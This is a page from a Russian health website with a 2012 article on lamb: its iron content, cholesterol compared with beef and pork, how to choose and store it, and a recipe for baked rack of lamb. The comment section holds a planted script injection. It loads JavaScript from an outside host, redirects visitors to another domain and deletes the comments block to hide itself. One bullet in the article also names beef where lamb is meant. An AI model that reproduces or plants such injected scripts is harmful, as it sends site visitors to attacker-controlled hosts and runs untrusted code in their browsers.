Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Баранина: польза для сосу...  >>  Баранина: польза для сосудов и крови
 
Обратная связь
 

Баранина: польза для сосудов и крови

Размер шрифта
28 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Это мясо богато железом и, в отличие от говядины, бедно холестерином, а значит, крайне полезно для тех, кто заботится о здоровье сердечно-сосудистой системы. Как выбрать баранину, как ее хранить и как приготовить?

1 

Бараниной называется мясо овцы или барана. Наиболее ценно мясо полуторогодовалых, кастрированных (во избежание специфического запаха) барашков или овец. Молодым мясо считается, если барашек был зарезан до трехлетнего возраста.

Достоинства баранины

  • По содержанию белка баранина не уступает говядине.
  • В мясе говядины много незаменимых аминокислот и минеральных веществ.
  • В бараньем жире холестерина в 4 раза меньше, чем в говяжьем, и в 2,5, чем в свином.
  • Поскольку баранина – мясо, в ней содержится железо, которое, как известно, повышает количество гемоглобина в крови, необходимого для переноса кислорода.

Если железа в организме мало, то эритроциты теряют способность переносить кислород к тканям, и ткани начинают постепенно умирать. Гемоглобин с достаточным количеством железа хорошо «цепляет» кислород в легких и переносит его ко всем тканям организма. В норме одна молекула гемоглобина может прицепить к себе 4 молекулы кислорода, а одним эритроцитом переносится более 1 миллиарда молекул кислорода.

Пьедестал почета по содержанию железа в 100 г

Говядина 2,6 мг
Баранина 2 мг
Свинина 1,6 мг

1

Как выбрать

  • Цвет бараньего мяса должен быть нежно-розовым, а не кирпично-красным.
  • Сильно выраженный запах бывает только у старой баранины, и почти не чувствуется в мясе молодых баранов.
  • Ребра должны быть тонкими, это признак молодого барашка.
  • Качественное мясо упругое и быстро восстанавливает форму, если на него нажать пальцем.
  • Многие недобросовестные продавцы подкрашивают мясо, чтобы оно выглядело свежим. Для того чтобы это определить, возьмите белую бумажную салфетку и приложите к куску мяса. Если на ней осталась краска, откажитесь от покупки.
  • Проверьте, чтобы на туше было специальное санитарное клеймо. Это гарантия того, что в мясе не будут развиваться вредоносные бактерии.

Как хранить

Свежее мясо можно хранить в самом холодном месте холодильника в вакуумной упаковке не дольше 2-3 дней. Его можно заморозить в морозильной камере, но перед этим нужно очистить мясо от видимых загрязнений, срезать излишки жира и порезать на порционные куски. Так баранина сохраниться до трех месяцев.

1

Как готовить

Баранину можно потушить, запечь, приготовить на пару.

Рецепт: «Корейка баранья запеченная»

Ингредиенты:
корейка баранья (ребрышко с мясом) – 500 г
оливковое масло – 3-5 ст. ложки
лимонный сок одного лимона
тимьян
немного соли и перца

Приготовление:
Маринуем корейку в оливковом масле с лимонным соком и тимьяном. Пришпариваем с двух сторон на раскаленной сковородке без жира. Делаем корочку, чтобы не дать вытечь соку из мяса. Отправляем ребрышки в духовку на противне на пергаментной бумаге для полного запекания. Подаем с припущенными овощами.

 

Сюжеты по теме:
Целый пир в овечьей шкуре. Готовим баранину
 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.